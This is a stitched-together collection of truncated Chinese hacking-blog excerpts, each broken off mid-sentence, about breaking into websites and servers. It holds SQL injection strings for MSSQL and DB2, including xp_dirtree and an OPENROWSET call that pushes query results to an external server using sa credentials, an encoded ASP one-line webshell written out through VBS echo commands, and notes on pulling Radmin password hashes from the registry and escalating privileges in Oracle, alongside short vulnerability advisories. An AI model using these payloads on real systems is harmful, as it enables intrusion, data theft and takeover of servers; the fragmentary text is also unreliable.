文章作者：enterer
博客：www.enterer.cn
转载请保留
最近在翻看以前的旧的黑客杂志，发现以前一篇利用快捷方式劫持来窃取期末考试的文章很有意思。因为最近在自己的博客里更新关于

来源：孤水绕城

今天和小猪一起搞站，asp脚本的一个sa权限的注入点，可是在echo一句话小马的时候出现了问题。%%以及里面的内容被过滤了。shell传不上去。ftp传不了，vbs下载也没有成功。不知道是%被过滤了，还是是被web防火墙拦截了。最后想了下，用vbs写了一个脚本。

脚本内容如下：

echo Dim str:str="60 37 69 120 101 99 117 116 101 71 108 111 98 97 108 32 114 101 113 117 101 115 116 40 34 49 34 41 37 62":>c:\孤水绕城.vbs
echo Set fso=CreateObject("Scripting.FileSy

摘自：普瑞斯特 blog

注入点执行
aaa.com x.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2 nvarchar(500))
注入点执行
aaa.com x.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2) exec master.dbo.xp_dirtree [d:\] ,1,1;--
注入点执行
aaa.com x.asp?id=123;insert into OPENROWSET ('sqloledb','server=xx.xx.xx.xx,1433;Initial Catalog=master;uid=sa;pwd=woshinidie','select dirtree,num1,num2 from dhte

影响版本:
RhinoSoft Serv-U 9.0.0.5漏洞描述:
BUGTRAQ ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端，这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie，就可能触发这个溢出，导致在用户机器上执行任意指令。<*参考
http://www.rangos.de/ServU-ADV.txt

Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul

最近运气不好，拿下的某内网，Server区全部不能外连，没法反弹socks出来，导致渗透内网其它网段的时候很辛苦。其中一台MSSQL和Web是分离的，服务器虽然拿下了，但有时候上去执行一些管理员权限才能执行的命令时(该Server是IIS6+ASPX，权限不够)，只能用reDuh上3389，但reDuh实在是太慢了，我现在用reDuh连终端的时候都设置的最低分辨率(640 x 480)和最低色彩(256色)，即使这样好不容易上去了敲个命令还要等半天，实在让人抓狂.....

然后想到了psexec.e

来源：fhod's Blog

Radmin 是一款很不错的服务器管理
无论是 远程桌面控制 还是 文件传输
速度都很快 很方便
这样也形成了 很多服务器都装了 radmin这样的
现在你说 4899默认端口 没密码的 服务器你上哪找?
大家都知道radmin的密码都是32位md5加密后
存放在注册表里的
具体的表键值为 HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\

那在攻陷一台web服务器时 大家 怎么能进一步提权?
如果你说 暴力破解 radmin 密码 呵呵 那也行
只不过 你要有足够的时间 跟精力
我想很

作者:博士
漏洞文件download.php

       <?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY);                                 //注意!!
if(empty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);

作者:st0p&Rainy'Fox
同样是在magic_quotes_gpc=off的情况下可用

漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl

author: cnryan @http://hi.baidu.com/cnryan

   网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。

这是官方的话 ↑
这个sql injection出现在找回密码处，最新版本的9.4也存在漏洞，随后对v9.0等以下版本测试均存在漏洞。

漏洞页面：getpwd2.asp

漏洞代码：
<%
u

受影响系统：
动网论坛 Dvbbs php 2.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ   ID: 36282
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数，远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。
<*来源：Securitylab.ir
  
   链接：

作者：浅凝

很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。

而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用

转自:[朱总司令]

DB2数据库ASCII半折法注射方法

UNION方式暂没空研究，有空再折腾，项目里遇到DB2的数据库，网上没完整的资料，顺手整了这一份，第一条和第二条已在实际注射环境测试，其余各条在查询分析器中测试OK。

做人要厚道，转载请注明出处

猜用户表数量：
and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)

猜表长度：
and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)